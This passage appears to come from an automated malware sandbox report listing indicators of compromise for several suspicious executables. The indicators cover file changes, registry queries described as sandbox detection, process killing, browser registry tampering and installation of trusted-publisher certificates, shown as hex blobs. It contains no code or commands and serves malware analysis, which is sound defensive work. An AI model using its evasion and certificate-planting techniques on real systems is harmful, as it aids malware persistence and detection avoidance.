C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIDB4E.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSI1E86.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI305C.tmp msiexec.exe File created C:\Windows\Installer\f759413.msi msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 8 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6436 4664 WerFault.exe RunWW.exe 2584 4664 WerFault.exe RunWW.exe 4464 4664 WerFault.exe RunWW.exe 6660 4664 WerFault.exe RunWW.exe 6292 4664 WerFault.exe RunWW.exe 5920 4664 WerFault.exe RunWW.exe 3120 4664 WerFault.exe RunWW.exe 5172 4664 WerFault.exe RunWW.exe -
Checks SCSI registry key(s) 3 TTPs 13 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
tapinstall.exetoolspab1.exetapinstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3048 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 812 taskkill.exe 4408 taskkill.exe 7108 taskkill.exe 5176 taskkill.exe -
Modifies Control Panel 1 IoCs
Processes:
1.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Colors 1.exe -
Processes:
MicrosoftEdgeCP.exe1.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 14 IoCs
Processes:
svchost.exefile.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe -
Modifies registry class 64 IoCs
Processes:
1.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeguihuali-game.exesvchost.exeMicrosoftEdge.exerundll32.exerundll32.exesvchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedHeight = "600" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{S7V0R8R0-BTEQ-SG8D-7S08-7D82QC4B5132} svchost.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration 1.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144" 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "0" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings guihuali-game.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge 1.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{51476665-4F58-4A86-AF57-F2CD5BE81FA1}" 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{K2A7A3K0-ECRB-LM0G-2M91-3G19BV5P5669}\1 = "4948" svchost.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy 1.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" 1.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming 1.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{X6S7Y5Y3-WINZ-VP5O-6V75-6M59ZP1Y8621} rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{X6S7Y5Y3-WINZ-VP5O-6V75-6M59ZP1Y8621} rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{K2A7A3K0-ECRB-LM0G-2M91-3G19BV5P5669} svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" 1.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" 1.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" 1.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry 1.exe -
Processes:
tapinstall.exeaskinstall20.exehqm5br3cap4.exevpn.tmpdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb7862035